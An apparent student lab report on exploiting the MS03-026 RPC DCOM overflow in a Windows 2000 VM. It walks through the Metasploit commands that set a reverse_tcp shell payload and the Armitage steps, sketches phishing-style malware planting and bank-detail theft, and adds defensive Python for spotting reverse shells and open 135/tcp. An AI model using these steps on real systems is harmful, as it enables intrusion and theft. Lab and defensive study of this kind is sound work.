Front matter:
My Exploit: CVE-2003-0352 Microsoft RPC DCOM Interface Overflow (Metasploit exploit: exploit/windows/dcerpc/ms03_026_dcom)
Word count: 2114
Introduction:
To begin my report I will first note that the attack software I used was "Kali Linux", which gave me all the different tools and utilities needed to carry out my attack. Kali Linux is a large distribution which comes with countless penetration-testing programs already installed. These pre-installed programs are the ones needed to carry out my exploit on the Windows 2000 virtual machine [1]. I ran Kali Linux through a virtual machine on 'Oracle', which allowed me to download the VMs needed to do the exploit. The vulnerability I used allowed me to trigger a stack buffer overflow in the RPCSS service; the vulnerability was reported by the 'Last Stage of Delirium' research group, and it has been widely exploited ever since [2].
Anatomy of an attack:
Step 1 & 2
To begin this attack I loaded up my Kali Linux VM on my Oracle platform and started the Metasploit Framework to begin my exploit. Once this was done I selected the exploit I wanted to use by typing 'use exploit/windows/dcerpc/ms03_026_dcom' into the Metasploit console. Step 2 is then to show the options of the chosen exploit to see what the hosts are currently set to. This lets me see what I need to change, such as RHOST and LHOST: RHOST needs to point at the Windows 2000 VM, and LHOST is the IP address of the Kali Linux operating system.
Step 3
Step 3 is to set RHOST to the IP address of the Windows 2000 server, which I collected with a Kali Linux tool called Nmap. Nmap lets me 'scan' across the network to see what is in use, so it picked up the IP addresses of my running VMs, including the Windows 2000 VM. To prove I obtained the IP address through the tool, it can be compared with the screenshot where I ran 'ipconfig' at the cmd prompt on Windows 2000.
Step 4
Step 4 is to set the payload with 'set PAYLOAD windows/shell/reverse_tcp'. This makes the target machine connect back to the attacking machine.
Step 5
Step 5 is to set LHOST, which is the Kali Linux IP address; I collected it by opening a new terminal and running the command 'ifconfig'.
Step 6
Step 6 is to run the exploit by typing the command 'exploit'. This should successfully launch the attack, and you should now have administrator access to the remote system. I can exploit the vulnerability because the relevant ports are open on this Windows 2000 server: when specific ports are open, an attacker can create a program that communicates with a vulnerable server over an affected TCP/UDP port and sends a specific kind of malformed RPC message [3].
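What steps 1 to 6 look like from the defender's side, as an added example that is not part of the report: a small Python routine run over constructed connection-log lines that flags a host which accepts a connection on 135/tcp (the RPC endpoint mapper port the exploit targets) and then, shortly afterwards, opens an outbound connection back to the same peer on a port that is not on the allow-list, which is exactly what the reverse_tcp payload chosen in step 4 produces. The log format, the IP addresses, the allow-list and the 60-second window are my assumptions; port 4444 is Metasploit's default LPORT, which the report itself does not state.

```python
import re
from datetime import datetime, timedelta

# Constructed sample firewall/connection log (not from the report). Format:
# "<timestamp> <action> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>"
# Line 2 is the reverse shell: the host hit on 135/tcp dials back to the
# same peer on 4444 one second later. 4444 is an assumption (Metasploit's
# default LPORT); the report does not state the port it used.
SAMPLE_LOG = """\
2017-11-26 10:00:01 ALLOW tcp 10.0.0.5:49172 -> 10.0.0.20:135
2017-11-26 10:00:02 ALLOW tcp 10.0.0.20:1045 -> 10.0.0.5:4444
2017-11-26 10:05:00 ALLOW tcp 10.0.0.7:50001 -> 10.0.0.21:135
2017-11-26 10:20:00 ALLOW tcp 10.0.0.21:1046 -> 10.0.0.9:443
2017-11-26 10:30:00 ALLOW tcp 10.0.0.8:50002 -> 10.0.0.22:445
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<action>\w+) (?P<proto>\w+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)

RPC_ENDPOINT_MAPPER_PORT = 135
# Outbound destination ports a server is expected to use (assumed allow-list).
EXPECTED_OUTBOUND_PORTS = {53, 80, 123, 443}
# How soon after the inbound 135/tcp connection a call-back counts (assumed).
WINDOW = timedelta(seconds=60)


def parse_line(line):
    """Parse one log line into a dict, or return None for unparseable lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    return {
        "ts": datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S"),
        "proto": d["proto"].lower(),
        "src": d["src"], "sport": int(d["sport"]),
        "dst": d["dst"], "dport": int(d["dport"]),
    }


def find_rpc_reverse_shell_candidates(log_text, window=WINDOW):
    """Return (victim, peer, inbound_ts, outbound_ts, outbound_port) tuples for
    every host that accepted a connection on 135/tcp and, within `window`,
    opened an outbound connection to that same peer on a non-allow-listed port."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]

    # Index inbound connections to the RPC endpoint mapper by victim address.
    inbound_135 = {}  # victim ip -> list of (peer ip, timestamp)
    for e in events:
        if e["proto"] == "tcp" and e["dport"] == RPC_ENDPOINT_MAPPER_PORT:
            inbound_135.setdefault(e["dst"], []).append((e["src"], e["ts"]))

    hits = []
    for e in events:
        if e["proto"] != "tcp" or e["dport"] in EXPECTED_OUTBOUND_PORTS:
            continue
        for peer, ts in inbound_135.get(e["src"], []):
            if e["dst"] == peer and ts <= e["ts"] <= ts + window:
                hits.append((e["src"], peer, ts, e["ts"], e["dport"]))
    return hits


if __name__ == "__main__":
    for victim, peer, t_in, t_out, port in find_rpc_reverse_shell_candidates(SAMPLE_LOG):
        print(f"{victim}: inbound 135/tcp from {peer} at {t_in}, "
              f"outbound to {peer}:{port} at {t_out} -> possible reverse shell")
```

Requiring the call-back to go to the same peer that touched port 135 is the conservative choice and matches the report's setup, where LHOST is the attacking machine; a looser rule would drop the peer match and alert on any outbound connection to an unexpected port within the window. Either way, the real fix is the MS03-026 patch [3] and not exposing 135/tcp beyond the hosts that need it.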
Step 7
Step 7 is to run the command 'dir C:\', which lists all the files and directories in the C:\ directory.
Step 8
Step 8 is to run the command 'net user', which shows all the user accounts on the machine. This proves I have successfully done the exploit, because 'net user' and 'dir C:\' would not work on Linux, as they are Windows commands.
The malicious actions possible after doing this exploit are that I could gain access to the files on the Win2k system by searching the directory of the C drive and downloading them. Another thing I could do is upload a file of my choice onto their computer; this could be an infected file, which could damage their computer if opened. One way of doing this is by making a shortcut to a commonly used application such as Internet Explorer, which people often use; once the person clicks on the file they have activated the malware and caused the computer to be infected. Another way in which the exploit could be carried further is by shortcutting a file labelled 'bank details needed' so the person fills their bank details into a form which I would have created myself, which you could then retrieve and download, giving you their personal bank details. The limitations are that I can't fully infect the computer, because I can't choose what is opened on their computer, and people may be more experienced in their knowledge of malware and choose not to open a suspicious application. A way to cover my tracks is that if something is done by accident it is possible to search through the files, check what was inputted by accident and remove it.
Step 9
The next couple of steps were just to make sure the exploit worked, as Armitage is a more basic way to run the exploit: it requires fewer commands to be typed, and the attack and exploit are ready to be launched through selection.
Step 9 is to run Armitage to start the Metasploit RPC server on Kali Linux and add the IP address of the Win2k server so that it can connect. Then I did a quick scan (OS detect), which successfully linked it to the Win2k server VM. From there I right-clicked the Windows logo to attack the VM through ms03_026_dcom (dcerpc) and clicked Launch. To show that the attack has worked, the Windows screen turns red.
Step 10
As listed above, I am adding this to this step: by running the command 'shell' you are able to run the same commands as I did in msf, and list the directories and the net user output of the Win2k server. As mentioned above, these are Windows commands and would not usually work on a Linux system.
Related software
One piece of software I used within the exploit was Kali Linux, which let me use a tool within it called 'Nmap'. This allowed me to check for open ports and to retrieve the IP address of my other Windows 2000 VM; in that sense it allows you to scan for open ports on other servers. Nmap is naturally a utility for checking whether ports are open or closed, but through the command I used it also showed the other VMs' IP addresses. Relating to Nmap, there are alternatives we can use to confirm that the ports we are checking are open. The Nmap scan tells us which ports are open, but if we want to double-check it is a good idea to use a different tool such as arp-scan, which offers the same features as Nmap, so we could have used that to carry out the exploit as well. Another piece of software that could have been used for my exploit was 'Parrot OS', which is an alternative to 'Kali Linux' with all the programs and tools pre-installed. For my own ease I used 'Kali Linux', as I have used it many times before and know it can carry out an attack; however, 'Parrot OS' is so similar that I could have used that too, as it also has Nmap, Armitage, etc.
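The port check that Nmap performs above can be turned into a defender's exposure audit by parsing Nmap's XML output (the -oX format) and listing every live host on which 135/tcp is open, i.e. every host that needs the MS03-026 patch [3] or a firewall rule in front of the RPC endpoint mapper. The following Python is an added example, not code from the report or from the Nmap project; the XML sample is constructed to mirror the shape of Nmap's output, and the addresses and hostnames in it are made up.

```python
import xml.etree.ElementTree as ET

# Constructed sample of Nmap XML output (nmap -oX); the hosts are invented.
# Host .20 has the RPC endpoint mapper open, .21 has it filtered, .22 is down.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -p 135,139,445 -oX - 10.0.0.0/29">
  <host><status state="up"/>
    <address addr="10.0.0.20" addrtype="ipv4"/>
    <hostnames><hostname name="win2k-lab" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.21" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="filtered"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="445"><state state="closed"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host><status state="down"/>
    <address addr="10.0.0.22" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

RPC_ENDPOINT_MAPPER_PORT = 135


def hosts_exposing_port(xml_text, port=RPC_ENDPOINT_MAPPER_PORT, proto="tcp"):
    """Return the IPv4 addresses of hosts that are up and have `port`/`proto`
    reported as open in an Nmap XML document. Filtered and closed ports are
    ignored: only a reachable, listening port counts as exposure."""
    root = ET.fromstring(xml_text)
    exposed = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # Nmap still lists down hosts; they cannot be reached
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        for p in host.findall("ports/port"):
            state = p.find("state")
            if (p.get("protocol") == proto and int(p.get("portid")) == port
                    and state is not None and state.get("state") == "open"):
                exposed.append(addr_el.get("addr"))
    return exposed


if __name__ == "__main__":
    # A real run would read the file produced by "nmap -p 135 -oX scan.xml <range>".
    for addr in hosts_exposing_port(SAMPLE_NMAP_XML):
        print(f"{addr}: 135/tcp open - check for the MS03-026 patch or firewall the port")
```

Nmap reports a port as open, closed or filtered; treating only "open" as exposure keeps the list short enough to act on, and running the same audit after patching or adding firewall rules shows whether the exposure has actually gone away.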
Conclusion
My conclusion to this report is that the exploits possible in our society are always improving, as is our security; however, it always seems that the exploits are a step ahead, because once an exploit has been carried out the flaws which were exploited then need to be fixed so it cannot happen again. Security levels have increased dramatically, as they needed to, compared with when computers first came out and how vulnerable they were. These days it seems normal for computers to always have security measures such as software like 'McAfee', etc. In summary, my attack was a straightforward one which allowed me to trigger a stack buffer overflow in the RPCSS service, using Kali Linux as the main piece of software and Oracle to host my VMs.
References
[1] "Kali Linux," Wikipedia, 23-Nov-2017.
[2] Metasploit, "Exploit." [Online]. Available: https://www.exploit-db.com/exploits/16749/. [Accessed: 26-Nov-2017].
[3] BetaFred, "Microsoft Security Bulletin MS03-026 - Critical." [Online]. Available: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-026. [Accessed: 24-Nov-2017].